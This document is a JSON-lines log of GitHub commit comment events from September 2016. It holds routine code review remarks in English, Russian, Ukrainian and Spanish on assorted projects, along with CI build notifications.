{"id":"4521272492","type":"CommitCommentEvent","actor":{"login":"thehoneymad"},"repo":{"name":"NerdCats/TaskCat"},"payload":{"comment":{"id":18910817,"position":null,"line":null,"path":null,"commit_id":"cc91602f06677841306f5fb1e536cc2922d66194","created_at":"2016-09-06T13:23:32Z","updated_at":"2016-09-06T13:23:32Z","body":"What's the difference when you're creating the QueryResult here? :D\r\njobStateToFetchUpTo was supposed to fetch jobs up to that state. What was actually happening?"}},"created_at":"2016-09-06T13:23:32Z"}
{"id":"4521273696","type":"CommitCommentEvent","actor":{"login":"jgarcia100uniandes"},"repo":{"name":"Uniandes-MISO4203/artwork-201620-2"},"payload":{"comment":{"id":18910818,"position":12,"line":12,"path":"artwork-api/src/main/java/co/edu/uniandes/csw/artwork/dtos/detail/NationalityDetailDTO.java","commit_id":"6eb48554b86d1eacbcfb1be46959c44a16faceb9","created_at":"2016-09-06T13:23:45Z","updated_at":"2016-09-06T13:23:45Z","body":"Este DTO sobra"}},"created_at":"2016-09-06T13:23:45Z"}
{"id":"4521274048","type":"CommitCommentEvent","actor":{"login":"tap87"},"repo":{"name":"cul-it/mann-wagon"},"payload":{"comment":{"id":18910819,"position":null,"line":null,"path":null,"commit_id":"2eeae7cbecb06781f11dda475bc650a0aee63152","created_at":"2016-09-06T13:23:49Z","updated_at":"2016-09-06T13:23:49Z","body":"Yes, it does. I didn't realize that the html for the modal was outside the root element for the rest of the page."}},"created_at":"2016-09-06T13:23:49Z"}
{"id":"4521276656","type":"CommitCommentEvent","actor":{"login":"Karponter"},"repo":{"name":"Fraideron/node.js"},"payload":{"comment":{"id":18910825,"position":17,"line":17,"path":"Node_random/server.js","commit_id":"02b74c925affe996670794d1d3424925db0f4296","created_at":"2016-09-06T13:24:19Z","updated_at":"2016-09-06T13:24:19Z","body":"Не треба закривать сервер після кожного запроса. \r\nТак ти зможеш 100500 раз запрашувать імена. З закритим -- тільки раз."}},"created_at":"2016-09-06T13:24:19Z"}
{"id":"4521278889","type":"CommitCommentEvent","actor":{"login":"Karponter"},"repo":{"name":"Fraideron/node.js"},"payload":{"comment":{"id":18910827,"position":9,"line":9,"path":"Node_random/storage/user.js","commit_id":"02b74c925affe996670794d1d3424925db0f4296","created_at":"2016-09-06T13:24:43Z","updated_at":"2016-09-06T13:24:43Z","body":"this.names = require('./foreign_names.json');"}},"created_at":"2016-09-06T13:24:43Z"}
{"id":"4521279418","type":"CommitCommentEvent","actor":{"login":"airend"},"repo":{"name":"airend/proprietary_vendor_lge_hammerhead"},"payload":{"comment":{"id":18910829,"position":null,"line":null,"path":null,"commit_id":"3f3f48ba36337d9495b1f666983ff463d19ee4ad","created_at":"2016-09-06T13:24:48Z","updated_at":"2016-09-06T13:24:48Z","body":"Is it really an issue? These are the only messages for me on N:\r\n```\r\n09-05 00:15:26.901  2155  2155 V QcrilMsgTunnelSocket: Starting QcRil Sender & Receiver threads\r\n09-05 00:15:26.903  2155  2170 I QcrilMsgTunnelSocket: Connected to 'qmux_radio/rild_oem0' socket\r\n```\r\nAre yours flooding logcat on M? Because otherwise, I wouldn't worry too much, given all the other spam there.\r\n"}},"created_at":"2016-09-06T13:24:48Z"}
{"id":"4521281276","type":"CommitCommentEvent","actor":{"login":"wildefyr"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":18910833,"position":null,"line":null,"path":null,"commit_id":"d2cecaa16ac3c5039e0cf9aaaa4dde4131eda7b7","created_at":"2016-09-06T13:25:09Z","updated_at":"2016-09-06T13:25:09Z","body":"Try and contact the developers and see what they say about it."}},"created_at":"2016-09-06T13:25:09Z"}
{"id":"4521281762","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18910835,"position":6,"line":6,"path":"src/module03/homework/task1/Solution.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-06T13:25:14Z","updated_at":"2016-09-06T13:25:14Z","body":"Лишний межстрочный"}},"created_at":"2016-09-06T13:25:14Z"}
{"id":"4521282712","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18910838,"position":3,"line":3,"path":"src/module03/homework/task2/Adder.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-06T13:25:23Z","updated_at":"2016-09-06T13:25:23Z","body":"Лишний межстрочный"}},"created_at":"2016-09-06T13:25:23Z"}
{"id":"4521282895","type":"CommitCommentEvent","actor":{"login":"cappadona"},"repo":{"name":"cul-it/mann-wagon"},"payload":{"comment":{"id":18910839,"position":null,"line":null,"path":null,"commit_id":"2eeae7cbecb06781f11dda475bc650a0aee63152","created_at":"2016-09-06T13:25:25Z","updated_at":"2016-09-06T13:25:25Z","body":"Cool...I might try setting and passing that variable again later today. Thanks."}},"created_at":"2016-09-06T13:25:25Z"}
{"id":"4521283345","type":"CommitCommentEvent","actor":{"login":"tahonermann"},"repo":{"name":"tahonermann/text_view"},"payload":{"comment":{"id":18910840,"position":26,"line":24,"path":"CMakeLists.txt","commit_id":"d0f03e5c9ca48716fdff9244f4649410966eb1aa","created_at":"2016-09-06T13:25:30Z","updated_at":"2016-09-06T13:25:30Z","body":"Ah, right, that didn't occur to me.  I removed the redundant options in commit 8e74b4075b1e9e29bb05ecdb695422f4843a73e6.\r\n\r\nI agree adding <tt>-Og</tt> for RELWITHDEBINFO would make sense, but decided to just let the defaults rule.  I presume someone who has thought about this more than I elected not to add <tt>-Og</tt> by default."}},"created_at":"2016-09-06T13:25:30Z"}
{"id":"4521283606","type":"CommitCommentEvent","actor":{"login":"ocean90"},"repo":{"name":"Automattic/o2"},"payload":{"comment":{"id":18910842,"position":7,"line":37,"path":"inc/template-tags.php","commit_id":"d71599cc7083d753d34b70ed9db9a454667f9662","created_at":"2016-09-06T13:25:32Z","updated_at":"2016-09-06T13:25:32Z","body":"Shouldn't this be \"Log in\" since \"login\" is not a verb?"}},"created_at":"2016-09-06T13:25:32Z"}
{"id":"4521283831","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18910844,"position":3,"line":3,"path":"src/module03/homework/task2/Main.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-06T13:25:35Z","updated_at":"2016-09-06T13:25:35Z","body":"Лишний межстрочный"}},"created_at":"2016-09-06T13:25:35Z"}
{"id":"4521285690","type":"CommitCommentEvent","actor":{"login":"andrei-ivanov"},"repo":{"name":"spring-projects/spring-data-commons"},"payload":{"comment":{"id":18910846,"position":17,"line":206,"path":"src/main/java/org/springframework/data/domain/Sort.java","commit_id":"acf12423e0a6dc197a64ecfdb8a46be81c895434","created_at":"2016-09-06T13:25:57Z","updated_at":"2016-09-06T13:25:57Z","body":"I assume == should be enough for enums"}},"created_at":"2016-09-06T13:25:57Z"}
{"id":"4521286101","type":"CommitCommentEvent","actor":{"login":"GreenLunar"},"repo":{"name":"assaultcube/AC"},"payload":{"comment":{"id":18910850,"position":92,"line":92,"path":"config/convert_pre_v1.2_mapconfig.sh","commit_id":"9c964d95b457785310a3ecc1d2c96a2ec76fefe8","created_at":"2016-09-06T13:26:03Z","updated_at":"2016-09-06T13:26:03Z","body":"Apparently so.  For whatever reason, it did not work for me at the time."}},"created_at":"2016-09-06T13:26:03Z"}
{"id":"4521286362","type":"CommitCommentEvent","actor":{"login":"Karponter"},"repo":{"name":"Fraideron/node.js"},"payload":{"comment":{"id":18910854,"position":15,"line":15,"path":"Node_random/storage/user.js","commit_id":"02b74c925affe996670794d1d3424925db0f4296","created_at":"2016-09-06T13:26:07Z","updated_at":"2016-09-06T13:26:07Z","body":"```\r\nvar pos = Math.floor(Math.random() * this.names.lenfth);\r\nreturn this.names[pos].name;\r\n```"}},"created_at":"2016-09-06T13:26:07Z"}
{"id":"4521287914","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18910860,"position":3,"line":3,"path":"src/module03/homework/task3/CollegeStudent.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-06T13:26:23Z","updated_at":"2016-09-06T13:26:23Z","body":"Лишний межстрочный"}},"created_at":"2016-09-06T13:26:23Z"}
{"id":"4521290442","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18910866,"position":56,"line":103,"path":"fcrepo-export/src/test/java/org/fcrepo/exporter/ExporterTest.java","commit_id":"a59ade888515142d359685280d33f06291b2fdc8","created_at":"2016-09-06T13:26:49Z","updated_at":"2016-09-06T13:26:49Z","body":"Okay, this is a small thing in the grand scheme of things, but seriously, `new ArrayList<>()`."}},"created_at":"2016-09-06T13:26:49Z"}
{"id":"4521292171","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18910872,"position":43,"line":43,"path":"src/module03/homework/task3/Course.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-06T13:27:09Z","updated_at":"2016-09-06T13:27:09Z","body":"почему конструкторы внизу?"}},"created_at":"2016-09-06T13:27:09Z"}
{"id":"4521292969","type":"CommitCommentEvent","actor":{"login":"Karponter"},"repo":{"name":"Fraideron/node.js"},"payload":{"comment":{"id":18910875,"position":6,"line":6,"path":"Node_random/storage/user.js","commit_id":"02b74c925affe996670794d1d3424925db0f4296","created_at":"2016-09-06T13:27:16Z","updated_at":"2016-09-06T13:27:16Z","body":"Буэ"}},"created_at":"2016-09-06T13:27:16Z"}
{"id":"4521294908","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18910882,"position":34,"line":34,"path":"src/module03/homework/task3/CollegeStudent.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-06T13:27:37Z","updated_at":"2016-09-06T13:27:37Z","body":"почему конструкторы внизу?"}},"created_at":"2016-09-06T13:27:37Z"}
{"id":"4521301622","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18910891,"position":138,"line":138,"path":"src/module02/homework/Task1.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-06T13:28:50Z","updated_at":"2016-09-06T13:28:50Z","body":"Лишний межстрочный"}},"created_at":"2016-09-06T13:28:50Z"}
{"id":"4521305364","type":"CommitCommentEvent","actor":{"login":"Jassob"},"repo":{"name":"dtekcth/DNollK.se"},"payload":{"comment":{"id":18910901,"position":null,"line":null,"path":null,"commit_id":"868e24af08b6baf6fc8b3ed81d6e82d3f7313292","created_at":"2016-09-06T13:29:30Z","updated_at":"2016-09-06T13:29:30Z","body":"This fixes #22 "}},"created_at":"2016-09-06T13:29:30Z"}
{"id":"4521305935","type":"CommitCommentEvent","actor":{"login":"elyezer"},"repo":{"name":"kbidarkar/robottelo-ci"},"payload":{"comment":{"id":18910904,"position":20,"line":42,"path":"scripts/satellite6-provisioning.sh","commit_id":"c3dfa4513fdb31ecbbf50856601393acca9df62d","created_at":"2016-09-06T13:29:37Z","updated_at":"2016-09-06T13:29:37Z","body":"if sat_version != nighty:\r\n    product_install:satellite6-upstream\r\nelse:\r\n    if sat_distribution == internal\r\n        product_install:satellite6-downstream\r\n    elif sat_distribution == ga\r\n        product_install:satellite6-cdn beta=False\r\n    elif sat_distribution == beta\r\n        product_install:satellite6-cdn beta=True\r\n"}},"created_at":"2016-09-06T13:29:37Z"}
{"id":"4521306436","type":"CommitCommentEvent","actor":{"login":"tausifj15"},"repo":{"name":"hrydgard/ppsspp"},"payload":{"comment":{"id":18910905,"position":null,"line":null,"path":null,"commit_id":"ad0167c9c1eb2af3492b4601d08903e536d6b4b2","created_at":"2016-09-06T13:29:43Z","updated_at":"2016-09-06T13:29:43Z","body":"Sir henrik can u pls fix god of war dark shaders"}},"created_at":"2016-09-06T13:29:43Z"}
{"id":"4521308682","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18910915,"position":9,"line":9,"path":"src/module03/homework/task3/CollegeStudent.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-06T13:30:09Z","updated_at":"2016-09-06T13:30:09Z","body":"Лишний межстрочный"}},"created_at":"2016-09-06T13:30:09Z"}
{"id":"4521309609","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18910919,"position":38,"line":166,"path":"fcrepo-export/src/main/java/org/fcrepo/exporter/Exporter.java","commit_id":"a59ade888515142d359685280d33f06291b2fdc8","created_at":"2016-09-06T13:30:20Z","updated_at":"2016-09-06T13:30:20Z","body":"If we're going to do 'em all (to which 👍 ), how about just\r\n```\r\nresponse.getLinkHeaders(\"describedby\")\r\n    .forEach(uri -> exportDescription((uri.toString().endsWith(\"/fcr:metadata\") ? response.getUrl() : uri), uri))\r\n```\r\nalthough the `fcr:metadata` test still seems weird."}},"created_at":"2016-09-06T13:30:20Z"}
{"id":"4521310945","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"nastylia/ror_beginner_exercises"},"payload":{"comment":{"id":18910920,"position":14,"line":13,"path":"lesson9/validation.rb","commit_id":"970b2a681b89347bbc52d556b352255b3a85f41a","created_at":"2016-09-06T13:30:34Z","updated_at":"2016-09-06T13:30:34Z","body":"Вообще, лучше всего было бы сделать так (псевдокод): `rules[name] << {type: type, args: args}`, т.е. это хеш, где ключами являются названия атрибутов, а значением - массив хешей (или тоже массивов) с информацией о валидаторах."}},"created_at":"2016-09-06T13:30:34Z"}
{"id":"4521311520","type":"CommitCommentEvent","actor":{"login":"mhennerich"},"repo":{"name":"analogdevicesinc/iio-oscilloscope"},"payload":{"comment":{"id":18910922,"position":null,"line":null,"path":null,"commit_id":"9815ff8bf0036ebb3253416be6a3d8b19bef3ed6","created_at":"2016-09-06T13:30:39Z","updated_at":"2016-09-06T13:30:39Z","body":"Now that we save remote_ip_addr to defaul ini file.\r\nSubsequent runs of OSC terminate immediatelly (exit normally).\r\n\r\nTrace for ctx_destroyed_by_do_quit\r\n\r\n-Michael"}},"created_at":"2016-09-06T13:30:39Z"}
{"id":"4521312808","type":"CommitCommentEvent","actor":{"login":"michaelbarton"},"repo":{"name":"bbushnell/tadpole-1"},"payload":{"comment":{"id":18910924,"position":null,"line":null,"path":null,"commit_id":"b2e149b882ef2ea02c98cdf588de472b2f17867a","created_at":"2016-09-06T13:30:52Z","updated_at":"2016-09-06T13:30:52Z","body":"@bbushnell do you have a pull request for these changes? I'm going to start benching in the next week or two. I'd like to have the updated tadpole biobox. If you would like me to create the PR let me know."}},"created_at":"2016-09-06T13:30:52Z"}
{"id":"4521315636","type":"CommitCommentEvent","actor":{"login":"mhennerich"},"repo":{"name":"analogdevicesinc/iio-oscilloscope"},"payload":{"comment":{"id":18910932,"position":null,"line":null,"path":null,"commit_id":"78ce02cd7564668a4f72bf0c3d14672f1119db79","created_at":"2016-09-06T13:31:21Z","updated_at":"2016-09-06T13:31:21Z","body":"Now that we save remote_ip_addr to defaul ini file.\r\nSubsequent runs of OSC terminate immediatelly (exit normally).\r\n\r\nTrace for ctx_destroyed_by_do_quit\r\n\r\n-Michael"}},"created_at":"2016-09-06T13:31:21Z"}
{"id":"4521315823","type":"CommitCommentEvent","actor":{"login":"IBAGomelTutor"},"repo":{"name":"energizerse/YSudakova"},"payload":{"comment":{"id":18910936,"position":1,"line":1,"path":"Autocompletion/index.html","commit_id":"3de46896fa6600d0193b4a8c02a1445d27351857","created_at":"2016-09-06T13:31:23Z","updated_at":"2016-09-06T13:31:23Z","body":"Incorrect behavior after following steps:\r\n1. enter any character to input field\r\n2. press backspace button"}},"created_at":"2016-09-06T13:31:23Z"}
{"id":"4521316012","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18910937,"position":null,"line":null,"path":null,"commit_id":"a73e1ad0998703e4a960e80b1c4c4121cf8dfd6f","created_at":"2016-09-06T13:31:24Z","updated_at":"2016-09-06T13:31:24Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 924](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12671&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-06T13:31:24Z"}
{"id":"4521317814","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18910942,"position":23,"line":23,"path":"src/module03/homework/task3/SpecialStudent.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-06T13:31:42Z","updated_at":"2016-09-06T13:31:42Z","body":"почему конструкторы внизу?"}},"created_at":"2016-09-06T13:31:42Z"}
{"id":"4521318597","type":"CommitCommentEvent","actor":{"login":"mccalluc"},"repo":{"name":"Caleydo/caleydo.github.io"},"payload":{"comment":{"id":18910944,"position":null,"line":null,"path":null,"commit_id":"5ff29f3efa23b4ce244fbd095be15b04f52e808b","created_at":"2016-09-06T13:31:51Z","updated_at":"2016-09-06T13:31:51Z","body":"Thanks! Should parseMatrix error if it is called with just one argument? Or is there a story where passing in the single argument is valid?"}},"created_at":"2016-09-06T13:31:51Z"}
{"id":"4521321164","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18910953,"position":34,"line":34,"path":"src/module03/homework/task3/SpecialStudent.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-06T13:32:19Z","updated_at":"2016-09-06T13:32:19Z","body":"где email?"}},"created_at":"2016-09-06T13:32:19Z"}
{"id":"4521322241","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18910958,"position":3,"line":3,"path":"src/module03/homework/task3/Student.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-06T13:32:27Z","updated_at":"2016-09-06T13:32:27Z","body":"Лишний межстрочный"}},"created_at":"2016-09-06T13:32:27Z"}
{"id":"4521323108","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18910962,"position":11,"line":11,"path":"src/module03/homework/task3/Student.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-06T13:32:37Z","updated_at":"2016-09-06T13:32:37Z","body":"Лишний межстрочный"}},"created_at":"2016-09-06T13:32:37Z"}
{"id":"4521325780","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18910969,"position":52,"line":52,"path":"src/module03/homework/task3/Student.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-06T13:33:08Z","updated_at":"2016-09-06T13:33:08Z","body":"конструкторы наверх после полей"}},"created_at":"2016-09-06T13:33:08Z"}
{"id":"4521326692","type":"CommitCommentEvent","actor":{"login":"shacknetisp"},"repo":{"name":"red-eclipse/base"},"payload":{"comment":{"id":18910970,"position":null,"line":null,"path":null,"commit_id":"b525c57162e4d33f351237c8546de268df0fa8a7","created_at":"2016-09-06T13:33:17Z","updated_at":"2016-09-06T13:33:17Z","body":"This should probably be merged into stable as soon as possible to reduce confusion for new players."}},"created_at":"2016-09-06T13:33:17Z"}
{"id":"4521328153","type":"CommitCommentEvent","actor":{"login":"RobStallion"},"repo":{"name":"ipcortex/FAC-FMC"},"payload":{"comment":{"id":18910975,"position":null,"line":null,"path":null,"commit_id":"8a3384c588039b8e827ab6bb428e5c52442fcc62","created_at":"2016-09-06T13:33:31Z","updated_at":"2016-09-06T13:33:31Z","body":"fixes issue #330"}},"created_at":"2016-09-06T13:33:31Z"}
{"id":"4521330901","type":"CommitCommentEvent","actor":{"login":"mikedurbin"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18910981,"position":38,"line":166,"path":"fcrepo-export/src/main/java/org/fcrepo/exporter/Exporter.java","commit_id":"a59ade888515142d359685280d33f06291b2fdc8","created_at":"2016-09-06T13:33:59Z","updated_at":"2016-09-06T13:33:59Z","body":"Is that still preferable if the whole block is wrapped in a null check for the \"response.getLInkHeaders(\"describedby\")\"?\r\n"}},"created_at":"2016-09-06T13:33:59Z"}
{"id":"4521334442","type":"CommitCommentEvent","actor":{"login":"mtrabelsi"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18910989,"position":4,"line":2333,"path":"application/src/main/webapp/js/chat.js","commit_id":"4727f969cb195f7e132f2c72394b08e320849cbf","created_at":"2016-09-06T13:34:36Z","updated_at":"2016-09-06T13:34:36Z","body":"I just used the webstorage to save settings (the destination room) when clicking on the notification popup, and when the new window is opened, we retrieve those info to show the correct Room."}},"created_at":"2016-09-06T13:34:36Z"}
{"id":"4521336081","type":"CommitCommentEvent","actor":{"login":"pooleja"},"repo":{"name":"pooleja/SpeedE16"},"payload":{"comment":{"id":18910992,"position":null,"line":null,"path":null,"commit_id":"4d8dd1989dcdde8fc2bb413d316eb3cf88346780","created_at":"2016-09-06T13:34:54Z","updated_at":"2016-09-06T13:34:54Z","body":"Did you take a look at the main Readme.md?\r\n\r\nOnce you have the server running:\r\n```\r\n$ python3 speedE16-server.py\r\n```\r\n\r\nYou can run the client.py against it like so:\r\n```\r\n$ python3 client.py\r\nRunning upload/download test against: 0.0.0.0\r\nCreated temp file: /home/ubuntu/SpeedE16/client-data/V31X6MAMU029FFY8DBAJ\r\nGenerated a hash of the temp file: 18d909ccf9151f8aa52b41f0b9312b93391c57c0f895d4f0dab573af5cd51cf2\r\nUploaded the file.  Elapsed time: 0.6494739055633545\r\nUpload shows success\r\nDownloading: http://0.0.0.0:8016/download?file=1U85DVKFJLY6M6J7HIGN to: /home/ubuntu/SpeedE16/client-data/1U85DVKFJLY6M6J7HIGN\r\nDownloaded the file.  Elapsed Time: 0.5735130310058594\r\nDownload shows success\r\nDeleted the temp downloaded file: /home/ubuntu/SpeedE16/client-data/V31X6MAMU029FFY8DBAJ\r\nUpload Speed: 12.31766192832765 Mbps\r\nDownload Speed: 13.94911635393733 Mbps\r\n```\r\n\r\nThis shows that the client has connected to your local speed server and tested upload/download speeds.\r\n\r\nDoes that make sense?"}},"created_at":"2016-09-06T13:34:54Z"}
{"id":"4521336885","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18910993,"position":95,"line":95,"path":"src/module03/homework/task4/User.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-06T13:35:04Z","updated_at":"2016-09-06T13:35:04Z","body":"я думаю это должно должно быть void"}},"created_at":"2016-09-06T13:35:04Z"}
{"id":"4521339068","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18911000,"position":null,"line":null,"path":null,"commit_id":"0d5088ead666d23ebda79100cfa04030835170f4","created_at":"2016-09-06T13:35:29Z","updated_at":"2016-09-06T13:35:29Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#GkY0nfy9QRmPCCh6TBxv6A"}},"created_at":"2016-09-06T13:35:29Z"}
{"id":"4521343910","type":"CommitCommentEvent","actor":{"login":"thomasdelhomenie"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18911015,"position":4,"line":2333,"path":"application/src/main/webapp/js/chat.js","commit_id":"4727f969cb195f7e132f2c72394b08e320849cbf","created_at":"2016-09-06T13:36:19Z","updated_at":"2016-09-06T13:36:19Z","body":"Yes I know :)\r\nBut this should be written in a comment in the code."}},"created_at":"2016-09-06T13:36:19Z"}
{"id":"4521346095","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18911018,"position":null,"line":null,"path":null,"commit_id":"ed3d9ce68b87e3039a8574ccb19fb79037e1f1a9","created_at":"2016-09-06T13:36:41Z","updated_at":"2016-09-06T13:36:41Z","body":"Weirdly enough `import` statements are one of the few things still not supported by Node >= 6, so we still have to use `require()` since we're not relying on Babel atm\r\n\r\nhttps://nodesource.com/blog/es-modules-and-node-js-hard-choices/"}},"created_at":"2016-09-06T13:36:41Z"}
{"id":"4521346278","type":"CommitCommentEvent","actor":{"login":"escowles"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18911019,"position":38,"line":166,"path":"fcrepo-export/src/main/java/org/fcrepo/exporter/Exporter.java","commit_id":"a59ade888515142d359685280d33f06291b2fdc8","created_at":"2016-09-06T13:36:43Z","updated_at":"2016-09-06T13:36:43Z","body":"Can we avoid the `fcr:metadata` check by checking whether the description URL starts with the subject of the triples?  Would that be any better than testing for fcr:metadata?"}},"created_at":"2016-09-06T13:36:43Z"}
{"id":"4521349181","type":"CommitCommentEvent","actor":{"login":"mtrabelsi"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18911027,"position":37,"line":457,"path":"application/src/main/webapp/js/notif.js","commit_id":"4727f969cb195f7e132f2c72394b08e320849cbf","created_at":"2016-09-06T13:37:13Z","updated_at":"2016-09-06T13:37:13Z","body":"@thomasdelhomenie  here is where we set them"}},"created_at":"2016-09-06T13:37:13Z"}
{"id":"4521349289","type":"CommitCommentEvent","actor":{"login":"jglick"},"repo":{"name":"jenkinsci/docker"},"payload":{"comment":{"id":18911028,"position":9,"line":26,"path":"README.md","commit_id":"42fcf2b407fe4beddc91f9d11576c661bad44ec4","created_at":"2016-09-06T13:37:14Z","updated_at":"2016-09-06T13:37:14Z","body":"typo"}},"created_at":"2016-09-06T13:37:14Z"}
{"id":"4521350949","type":"CommitCommentEvent","actor":{"login":"select-artur"},"repo":{"name":"postgrespro/rum"},"payload":{"comment":{"id":18911032,"position":null,"line":null,"path":null,"commit_id":"c380a0d87b814845cdec0c6ea3fa0fd3b3f88c81","created_at":"2016-09-06T13:37:31Z","updated_at":"2016-09-06T13:37:31Z","body":"Hello,\r\n\r\nThis is a temporary restriction. This feature causes a bug at query results.\r\nWhen this bug will be fixed then we will return the feature."}},"created_at":"2016-09-06T13:37:31Z"}
{"id":"4521350993","type":"CommitCommentEvent","actor":{"login":"ht35268"},"repo":{"name":"ht35268/bzShare"},"payload":{"comment":{"id":18911033,"position":12,"line":17,"path":"bzs/sqlfs/file_storage.py","commit_id":"98c521902f209056d9c9d7362ec182b01b3332f1","created_at":"2016-09-06T13:37:32Z","updated_at":"2016-09-06T13:37:32Z","body":"Aware considered. `SHA256` is indeed time-consuming and no, nobody would ever bother / permitted to upload gigantic loads of (aaaaaaa-zzzzzzz)-like sparsed files. Such people should be banned anyway."}},"created_at":"2016-09-06T13:37:32Z"}
{"id":"4521351055","type":"CommitCommentEvent","actor":{"login":"jglick"},"repo":{"name":"jenkinsci/docker"},"payload":{"comment":{"id":18911034,"position":14,"line":29,"path":"README.md","commit_id":"42fcf2b407fe4beddc91f9d11576c661bad44ec4","created_at":"2016-09-06T13:37:32Z","updated_at":"2016-09-06T13:37:32Z","body":"ditto"}},"created_at":"2016-09-06T13:37:32Z"}
{"id":"4521351089","type":"CommitCommentEvent","actor":{"login":"SebastianStamm"},"repo":{"name":"bpmn-io/table-js"},"payload":{"comment":{"id":18911035,"position":14,"line":155,"path":"lib/features/editing/EditBehavior.js","commit_id":"63ebfc236edbad0b21dd8b4a419d86fd39400aa6","created_at":"2016-09-06T13:37:33Z","updated_at":"2016-09-06T13:37:33Z","body":"Do we still need the keyboard service? If not, we should remove it from the injected services."}},"created_at":"2016-09-06T13:37:33Z"}
{"id":"4521353039","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"nastylia/ror_beginner_exercises"},"payload":{"comment":{"id":18911041,"position":17,"line":17,"path":"lesson9/acessors.rb","commit_id":"4bef857bc276179653ec23f18d6879c545e4ae52","created_at":"2016-09-06T13:37:53Z","updated_at":"2016-09-06T13:37:53Z","body":"Да, ты права, я не заметил, что в 21-й строке именно instance_variable_set. Там мог быт быть и _get и в этом случае, выражение не сработало бы. В общем, можно было бы и так, но лучше инициализировать переменную в момент первого использования, т.е. в метод history_get:\r\n\r\n```\r\n define_method(history_get) do\r\n   instance_variable_get(history_name) || instance_variable_set(history_name, [])\r\nend\r\n```\r\n\r\nТогда ты гарантированно знаешь, что если обращаться через метод history_get, вернется массив."}},"created_at":"2016-09-06T13:37:53Z"}
{"id":"4521357421","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18911051,"position":null,"line":null,"path":null,"commit_id":"4970f95c8305cf06c91b741068b4d1a2c73dbc02","created_at":"2016-09-06T13:38:41Z","updated_at":"2016-09-06T13:38:41Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 925](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12674&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-06T13:38:41Z"}
